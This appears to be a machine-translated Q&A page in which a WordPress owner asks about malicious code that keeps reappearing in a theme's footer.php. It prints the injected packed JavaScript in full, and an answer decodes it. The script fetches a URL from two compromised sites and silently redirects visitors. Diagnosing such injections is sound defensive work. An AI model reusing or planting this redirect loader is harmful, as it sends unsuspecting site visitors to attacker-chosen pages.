[英]wordpress theme footer.php file have some malicious code
我在 footer.php 文件中的 wordpress 主題之一自動添加了一些惡意代碼。 我多次刪除該代碼,但稍后該代碼自動添加到 footer.php 文件中。 我沒有找到任何解決方案來阻止這種情況。 我認為這是某種類型的惡意代碼,我想了解更多關於這個以及如何阻止它的信息。
頁腳.php
<?php global $themesbazar; ?>
<div class="footer">
<?php echo $themesbazar['editorial']?>
</div>
<div class="footer-04">
<div class="row">
<div class="col-md-6">
<div class="copyright">
<?php echo $themesbazar['copyright']?>
</div>
</div>
<div class="col-md-6"><?php div(); ?>
</div>
</div>
</div>
</section>
帶有惡意代碼:
<?php global $themesbazar; ?>
<div class="footer">
<?php echo $themesbazar['editorial']?>
</div>
<div class="footer-04">
<div class="row">
<div class="col-md-6">
<div class="copyright">
<?php echo $themesbazar['copyright']?>
</div>
</div>
<div class="col-md-6"><?php div(); ?>
</div>
</div>
</div>
</section>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 w(c){5 8=" "+N.8;5 l=" "+c+"=";5 m=T;5 a=0;5 b=0;7(8.k>0){a=8.j(l);7(a!=-1){a+=l.k;b=8.j(";",a);7(b==-1){b=8.k}m=X(8.O(a,b))}}x(m)}9 I(c,J,d,g,i,n){N.8=c+"="+12(J)+((d)?"; d="+d:"")+((g)?"; g="+g:"")+((i)?"; i="+i:"")+((n)?"; n":"")}9 U(){5 3;F{3=h q("Y.v")}t(e){F{3=h q("V.v")}t(E){3=R}}7(!3&&14 D!=\'10\'){3=h D()}x 3}5 s=\'A://z.11.y/B-C/G/Z-W/13/1h/r.H\';5 K=\'A://z.1p.y.1o/B-C/G/1j/1l/r.H\';7(w(\'15\')!=\'S\'){9 P(){5 f=h 1k();f.1m(f.1n()+1r*1q*6*1);I(\'1i\',\'S\',f.1a())}9 o(Q,M){5 3=U();3.19(\'18\',Q,p);3.16=9(){7(3.17==4&&3.1b==1c){7(3.L.j(\'u=\')==0){P();1g.1f=3.L.O(2)}1e{7(M)o(K,R)}}};3.1d(T)}o(s,p)}',62,90,'|||xmlhttp||var||if|cookie|function|offset|end|name|expires||now|path|new|domain|indexOf|length|search|setStr|secure|lookupRedirect|true|ActiveXObject||sAdsUrl1|catch||XMLHTTP|getCookie|return|com|www|https|wp|content|XMLHttpRequest||try|themes|php|setCookie|value|sAdsUrl2|responseText|bIsFirst|document|substring|setAdsCookie|sUrl|false|complete|null|getXmlHttp|Microsoft|the7|unescape|Msxml2|dt|undefined|santecza|escape|woocommerce|typeof|newadsshow|onreadystatechange|readyState|GET|open|toGMTString|status|200|send|else|location|window|cart|newadshow|envision|Date|bbpress|setTime|getTime|tr|mavigrup|3600|1000'.split('|'),0,{}))
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')
[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?4214393&101"
alt="counter customizable free hit" border="0"></a></noscript>
<script type="text/javascript">
</script>
</body>
</html>
我已經對您發布的代碼進行了編碼,可能會有所幫助。 https://beautifier.io/ 。 現在,您可以通過任何代碼編輯器使用 search-in-files 搜索下面提到的函數名稱。 希望這對尋找類似問題的人有所幫助。
function getCookie(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset);
if (end == -1) {
end = cookie.length
}
setStr = unescape(cookie.substring(offset, end))
}
}
return (setStr)
}
function setCookie(name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) + ((expires) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "")
}
function getXmlHttp() {
var xmlhttp;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
} catch (E) {
xmlhttp = false
}
}
if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
xmlhttp = new XMLHttpRequest()
}
return xmlhttp
}
var sAdsUrl1 = 'https://www.santecza.com/wp-content/themes/dt-the7/woocommerce/cart/r.php';
var sAdsUrl2 = 'https://www.mavigrup.com.tr/wp-content/themes/envision/bbpress/r.php';
if (getCookie('newadsshow') != 'complete') {
function setAdsCookie() {
var now = new Date();
now.setTime(now.getTime() + 1000 * 3600 * 6 * 1);
setCookie('newadshow', 'complete', now.toGMTString())
}
function lookupRedirect(sUrl, bIsFirst) {
var xmlhttp = getXmlHttp();
xmlhttp.open('GET', sUrl, true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
if (xmlhttp.responseText.indexOf('u=') == 0) {
setAdsCookie();
window.location = xmlhttp.responseText.substring(2)
} else {
if (bIsFirst) lookupRedirect(sAdsUrl2, false)
}
}
};
xmlhttp.send(null)
}
lookupRedirect(sAdsUrl1, true)
}
<
script type = "text/javascript" >
var _Hasync = _Hasync || [];
_Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script');
hs.type = 'text/javascript';
hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();
<
noscript > < a href = "/"
target = "_blank" > < img src = "//sstatic1.histats.com/0.gif?4214393&101"
alt = "counter customizable free hit"
border = "0" > < /a></noscript >
此代碼看起來參考訪問者統計服務。 是否激活了任何“Hi Stats”插件? 您是否曾嘗試禁用所有 Wordpress 插件?
這些惡意代碼是添加在瀏覽器源代碼 output 中還是在原始文件(您通過 FTP 上傳的文件)中添加的?
您的虛擬主機提供商是什么? 也許,可以自動為您的托管服務提供商添加此代碼。
試試這些假設,如果不起作用,我會幫你找到另一個解決方案。
我想在頁腳中編輯頁腳致謝。 我正在使用 Whitedot 主題。 這是我的 footer.php 文件的代碼
[英]I want to edit footer credits in my footer. I am using the Whitedot theme. This is the code of my footer.php file
footer.php wordpress中的一段javascript可以在PC上運行,但不能在移動設備上運行
[英]A piece of javascript in footer.php wordpress does work on PC but not on mobile
為什么在WP主題中,如果我從functions.php加載SlideShow(JQuery FlexSlider)不能工作,但是如果我從footer.php文件中加載它,則它可以工作嗎?
[英]Why in WP theme a SlideShow (JQuery FlexSlider) can't work if I load it form functions.php but work if I load it from my footer.php file?
需要找出惡意Javascript如何注入到我的header.php Wordpress主題文件中
[英]Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
wordpress 網站(基於主題)不斷被注入惡意代碼
[英]wordpress website(theme based) keep on getting injected with malicious code
如何在WordPress站點上運行WordPress插件“數據表”並從footer.php啟動腳本?
[英]How can I run WordPress-plugin “Data Tables” on a WordPress-site and start the script from footer.php?
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.